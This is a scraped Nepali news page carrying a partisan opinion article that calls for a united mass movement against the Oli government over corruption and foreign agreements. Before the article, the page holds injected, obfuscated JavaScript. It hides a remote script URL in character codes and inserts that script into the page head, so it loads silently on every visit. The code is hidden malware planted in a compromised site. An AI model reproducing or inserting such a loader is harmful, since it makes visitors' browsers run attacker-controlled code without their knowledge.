Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); आगामी जनआन्दोलन र यसको दिशा – जनदिशा

आगामी जनआन्दोलन र यसको दिशा

Last Updated Date:

नारायण प्रसाद शर्मा

मुलुकमा चौतर्फी बढ्दो अनियमितता र भ्रस्टाचार, राष्ट्र र राष्ट्रिय स्वतन्त्रता एवं स्वाभिमानमाथिको घात-प्रतिघात तथा जनता र जनतन्त्र/समाजवादविरोधी सर्वसत्तावादी सरकारी सोंच, शैली, संस्कार र संस्कृतिका कारण निकट भविष्यमा एउटा अर्को जनआन्दोलन हुने सुनिस्चित छ। २०६२/६३ को भीषण र भयावह आन्दोलनपछिको डेढ दशकमा मुलुकको व्यवस्था त फेरियो तर अवस्था फेरिएन। संविधान फेरियो तर शासन फेरिएन। पार्टी फेरिए तर परिपाटी फेरिएन। नेता र नीति फेरिए तर नियत र नियति फेरिएन। चुनिने, गनिने र मानिने पात्र र प्रतिनिधि पनि थोरैधेरै त फेरिए तर तिनको पारा र प्रवृत्ति पटक्कै फेरिएन। यसैगरी शासक शक्ति र व्यक्ति त फेरिए तर तिनको चिन्तन, चेतना र चरित्र फिटिक्कै फेरिएन।

यसरी फेर्नैपर्ने धेरै कुराहरु नफेरिने मात्र होइन कि तिनको पुरानै मति, गति, रीती, स्थिति, कृति र संस्कृतिमा झन्-झन् विकृती र विसङ्गती बढ्यो। समग्रमा भन्नुपर्दा २००७ सालको वरिपरिबाट सुरु भएको नेपाली राष्ट्रियता, जनतन्त्र र जनजीविका/समाजवादको आन्दोलन अधुरो र अपूरो नै रहिरह्यो। किनकी, पार्टी र तिनका प्रायः नेताहरुबाट देस, जनता र जनतन्त्र/समाजवादलाई धोका, विश्वासघात र गद्दारी त भयो-भयो, पूँजीवादी विधि र व्यवस्थाका मूल्य र मान्यतामाथि समेत कुठाराघात भयो, यसले गर्दा राष्ट्रियता, जनतन्त्र र जनजीविकाका सवालहरु दिनप्रतिदिन झन्झन् जटिल र गम्भीर एवं विकराल र विष्फोटक बन्दै गैरहेका छन्। त्यसैले फेरि एकपटक बृहत् जनआन्दोलन अनिवार्य र अपरिहार्य भएर आएको छ ।

नेपालमा विगत सात दशकदेखि प्रायः एक-डेढ दशकको अन्तरालमा ठूल्ठूला आन्दोलन र परिवर्तनका प्रकृयाहरु हुने गरेका भएपनि त्यसले मुलुक र जनताको चाहाना बमोजिमको अग्रगमन र लोकतान्त्रीकरणका दिशामा गति लिन सकेन। बरु राजनीतिक उपलब्धिका तुलनामा विकास, निर्माण अनि प्रगती र समृद्धिमा भएको क्षति र त्यो क्षतिपूर्ती गर्न आन्दोलनबाट आएका शक्ति र सरकारहरु पूरै विफल भएको शृंखलावद्ध इतिहास छ। अब एकातिर धेरैपटक आन्दोलनको भार र मार मुलुक र जनताले खप्नसक्ने अवस्था छैन भने अर्कातिर यिनै शक्ति र व्यक्तिका भनाइ र गराइ हेर्दा यिनमाथि पनि सहजै र पूरै भरविश्वास गर्न जनता तयार देखिंदैनन । तसर्थ एकातिर आगामी आन्दोलनलाई हामीले अन्तिम, निर्णायक र क्रान्तिकारी स्वरुप दिनु जरुरी छ भने सङ्गसङ्गै राजनीतिक पार्टी र नेताहरुको मात्र भर नपरेर नागरिक नेतृत्व, राष्ट्रिय व्यक्तित्व, स्वच्छ  र सामाजिक सेवा र संघर्षमा स्थापित र परिचित संघसंस्था र संगठन, असल चिन्तन र चरित्र भएका राजनेता बन्नसक्ने देसभक्ति, स्वाभिमान, स्वविवेक र दूरदृष्टि भएकाहरुलाई विशेष जिम्मेवारी दिएर अघि बढ्नुपर्ने आवश्यकता छ।

आज सरकारको स्वैच्छाचारिता, मुलुकको दुरावस्था र व्यवस्थाको बुराइका विरुद्धमा सत्तासीन पार्टी, संसद र सरकारभित्रैबाट र शीर्ष नेतृत्वहरुमध्येबाट समेत व्यक्तिगत र छिट्फुट रुपमा भएपनि असन्तुष्टिहरु सार्वजनिक भैरहेका छन्। प्रधानमन्त्री ओलीका गैरजिम्मेवारपूर्ण बोली, अराजक शैली र एकलकाँटे सोचका विरुद्ध आवाज उठिरहेका छन्। पार्टीमा विधिपद्धति स्थापित गर्ने सवालमा व्यक्तिगत् नै भएपनि वक्तव्यवाजी र बार्गेनिङ अनि आङ्गिक र आंशिक आन्तरिक वा बाह्य संवाद र संघर्ष पनि संचालन भएका छन्। तर यो संघर्षले मुलुक र जनतालाई खासै फरक पारिरहेको छैन। किनभने सत्तारुढ दलको यो संघर्ष मुलुक र जनताको हक र हितमा केन्दृत विचार र राजनीतिमा आधारित नभई लेनदेन र भागबन्डामा सिमित रहने र अन्तत:सहमति र सहकार्यका नाममा सस्ता सम्झौतामा टुङ्गिने गरेको प्रसस्त उदाहरण छ । त्यसैले अब तिनलाई प्रथमतः सामूहिक, संस्थागत, आधिकारिक र निर्णायक बनाउँने र द्वितीयत: नेताहरुलाई पनि शंका र विश्वासको कसीमा घोट्दै, गल्तीकमजोरी सुधार गर्न निरन्तर आलोचना र सुझाव-दवाव दिंदै संघर्षको भट्टीबाटै रुपान्तरण, शुद्धीकरण र क्रान्तिकारीकरण गर्दै अघि बढ्दै जानुपर्ने आवश्यकता छ ।

साथै सडक, सदन र समाजको संघर्षमा समर्पित वाम नामका शक्ति र संघसंस्थाहरुको बिचको हालको कार्यगत एकतालाई दीर्घकालीन संयुक्त मोर्चाको रुपमा विकास-विस्तार र सुदृढ-सबल पार्दै आन्दोलनलाई सफल पार्न पूरै प्रयत्न गर्नु जरुरी छ ।

यसैगरी वर्गीय, व्यावसायिक, जातीय, क्षेत्रीय, लिङ्गीय, भाषिक, धार्मिक र सांस्कृतिक शक्ति, समुदाय र नेतृत्वविशेषमा अवस्थित वर्गसंघर्ष, राष्ट्रिय एकता र अखण्डताका सम्बन्धमा देखिएका संकीर्णताहरुको खण्डनमण्डन गर्दै राष्ट्रियता, जनतन्त्र र जनजीविकासंग सम्बन्धित जनस्तरका खबर्दारी संघर्षहरुलाई पनि अनिवार्य रुपले समायोजन गर्नु जरुरी छ ।

यसका अतिरिक्त सारमा सत्ताको साथमा तर रुपमा सत्ताको विरुद्धमा गनिएका संसदवादी प्रतिपक्षी शक्तिहरुको रक्षात्मक, लेनदेनपूर्ण र भागबण्डामा सीमित संघर्षलाई र उनीहरुको सत्तासंचालकहरुसंगको अन्तर्विरोधलाई पनि उपयोग गर्दै तिनमा रहेका प्रतिगामी, प्रतिकृयावादी र यथास्थितिवादी सोंच र संस्कारका विरुद्ध पनि संघर्ष चलाउँदै संयुक्त आन्दोलन अघि बढाउनु पर्दछ ।

निष्कर्षमा भन्नुपर्दा नेपालको विशिष्टता, मौलिकता र ऐतिहासिकताको जगमा टेकेर वर्तमान ओली सरकारका भ्रष्ट, दुष्ट, निकृष्ट र निर्लज्ज गतिविधिहरुका विरुद्ध सडक संघर्षमा एकाकार हुनु आवश्यक छ। वर्तमान सरकारका दास, दलाल, दम्भी र दमनकारी कृयाकलापहरु, एमसीसी जस्ता चरम राष्ट्रघाति, शान्तिघाति र मित्रघाति सम्झौता पास गर्ने खुला र गुप्त हाँक र हर्कतहरु, अतिक्रमित भूमी समेटेर जारी गरिएको आधिकारिक नक्सा र पाठ्यपुस्तकलाई सार्वजनिक गर्न रोक लगाएर आफ्नो कुर्सी र ज्यान जोगाउन भारतीय खुफिया प्रमुखसंग प्रधानमन्त्रीले गरेको गोप्य वार्ता, कोरोना महामारीका बेला औषधिजन्य सामाग्री खरीदजस्तो संवेदनशील र गम्भीर अवस्थाका सामाग्रीमा र बुढी गण्डकी जस्ता राष्ट्रिय गैरवका आयोजनामा समेत अरबौंका भ्रष्टाचार गर्नेजस्ता नित्तान्त भ्रष्ट, दुष्ट, निकृष्ट र निर्लज्ज गतिविधिहरुका विरुद्ध सडकको आवाजलाई घनिभूत बनाउनु जरुरी भैसकेको छ।

मुलुक आज चरम आर्थिक, राजनीतिक, सामाजिक र सांस्कृतिक संकटमा फसिरहेको छ र राष्ट्रिय अस्मिता र अस्तित्व नै लोप हुने प्रबल खतरा छ। यी तमाम विकृती-विसङ्गती, संकट र खतराबाट बच्न एउटा मात्र अन्तिम उपाय हो संयुक्त र सशक्त जनआन्दोलन। यस्लाई पूर्णता र सफलतामा पुराउन सक्नु नै अहिलेको हाम्रो अहम् जिम्मेवारी हो। माथिको तरिकाले अघि बढेमा आन्दोलन विजयी बन्ने, मुलुकको स्वत्व र अस्तित्व कायम रहने, सुशासन, सुखशान्ति र समृद्धी कायम हुनेकुरामा शंका छैन। धन्यवाद !

(लेखक सत्तारुढ नेकपाका केन्द्रीय नेता हुन् )

यो सामग्री सेयर गर्नुहोस

तपाईलाई माथिको समाचार/लेख कस्तो लाग्यो ? प्रतिक्रिया दिनुहोस ।
Top